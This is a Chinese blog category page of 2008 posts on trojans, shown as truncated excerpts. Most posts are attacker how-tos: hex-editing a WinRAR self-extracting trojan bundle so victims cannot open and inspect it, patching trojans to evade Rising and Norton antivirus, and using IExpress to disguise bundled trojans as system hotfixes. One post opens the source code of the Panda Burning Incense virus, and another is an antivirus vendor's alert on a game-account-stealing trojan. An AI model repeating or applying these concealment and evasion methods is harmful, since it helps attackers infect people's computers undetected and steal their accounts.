English Sentence Loading...
英语句子加载中...
2013-07-20 00:38:38
欢迎阳历生日为1985年8月15日的朋友加入友情链接
长期招友情链接,做好请直接留言 MyqqAdmin@Msn.Com
木子美专题   密室之逃脱   论坛转帖器   中青基金会

浏览模式: 普通 | 列表
分类: 『木馬病毒』 | 1

利用WINRAR捆绑后的右键处理办法

[ 2008-10-14 22:50:22 | 作者: Admin ]
rar捆绑讨论

前提是木马绝对的免杀,这样做就能隐藏你很好的劳动成果!rarar捆绑后的完美解决.

前提是免杀的服务端,捆绑后就是做成自解压文件后,右键会出现一个“用WINRAR打开”的选项 如果别人真的打开了,那么我们的秘密不就暴露了吗?现在我们来解决它:

用到的工具:WINRAR WINHEX OD

以下就要开工了,用WINHEX打开它(目标:去除“用WINRAR打开”的选项)

查找rar!

rar!是WINRAR自解压文件识别压缩文件的标识

把查找到的rar!右边的16进制数值,也就是52 61 72 21

把其中的61改成60,保存文件

现在再看看,“用WINRAR打开”不见了,打开看看吧

压缩文件格式未知或已经损坏

压缩文件格式未知或已经损坏,损坏了,是因为他找不到压缩文件的标识,

我们用OD来修改吧~~~,用OD载入他

右键→查找→所有常量

输入52
...

阅读全文...

熊猫烧香(武汉男生)的病毒源码

[ 2008-09-04 06:02:05 | 作者: Admin ]
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = E8; //PE文件主图标的大小744字节
...

阅读全文...

木马免杀技术之独门绝技

[ 2008-07-09 04:08:38 | 作者: Admin ]
绝技一:快速搞定瑞星文件查杀
操作步骤:

 第一步:用OD载入,来到程序的入口点。

 第二步:把入口点的第一句PUSH EBP 改成POP EBP 然后保存就可以躲过瑞星的表面查杀。

绝技二:快速定位与修改瑞星内存特征码

原理:因为目前的内存查杀杀毒软件,只有瑞星才能威胁到我们的木马。也就是说只要搞定瑞星的内存查杀,那我们的木马在内存就畅通无阻了. 但由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,

这样对我们的定位和修改带来了方便.

操作步骤:

第一步:首先用特征码定位器大致定位出瑞星内存特征码位置.

第二步:然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.

绝技三:如何快速躲过诺顿的查杀

诺顿的查杀特点:大家...

阅读全文...

近日网游盗号木马病毒播报

[ 2008-06-16 01:45:00 | 作者: Admin ]
以下是近日最新出现的网游盗号病毒:

  “网游盗号木马61440”(Win32.Troj.OnlineGameT.nc.61440) 威胁级别:★

  此病毒属于一个比较老的木马家族,但它的变种一直层出不穷。此篇预警播报中的变种在技术上与以前的版本没有什么不同,但它所袭击的电脑数量却较高。毒霸反病毒工程师认为这与它借助对抗型下载器传播有一定关系。

  病毒进入用户电脑后,在系统盘中释放出两个病毒文件,分别是%WINDOWS%\目录下的fmsjhif.exe,以及%WINDOWS%\system32\目录下的fmsjhif.dll,前者是病毒主文件,会被写入注册表启动项,以实现自动启动。而后者是用来执行盗号工作的文件。

  当成功运行起来,病毒就搜索《热血江湖》、《魔兽世界》和“游戏茶苑大厅”的进程,将fmsjhif.dll注入其中,读取帐号和密码信息。然后发送给病毒作者指定的地址。
...

阅读全文...

木马免杀简单方法

[ 2008-06-10 20:39:40 | 作者: Admin ]
木马传播者最惯用的手段就是将木马程序和合法程序捆绑在一起,欺骗被攻击者。然而,现在杀毒软件对捆绑类软件已显出“咄咄逼人”的态势,几乎所有的捆绑类软件都会被查杀,大大小小的木马纷纷失效。   IExpress小档案
  出身:Microsoft
  功能:专用于制作各种 CAB 压缩与自解压缩包的工具。
  由于是Windows自带的程序,所以制作出来的安装包具有很好的兼容性。它可以帮助木马传播者制造不被杀毒软件查杀的自解压包,而且一般情况下还可伪装成某个系统软件的补丁(如IE的hotfix)来迷惑人。
  到哪里寻找永远都不会被查杀的捆绑方法或工具?远在天边,近在眼前。可千万别忘了与你朝夕相处的Windows。此次所要介绍的捆绑工具就是Windows自带的一个小巧的软件IExpress(适用于2000和XP系统)。
  原理
  IExpress使用了多种不同的自解压缩文件技术对软件更新文...

阅读全文...
1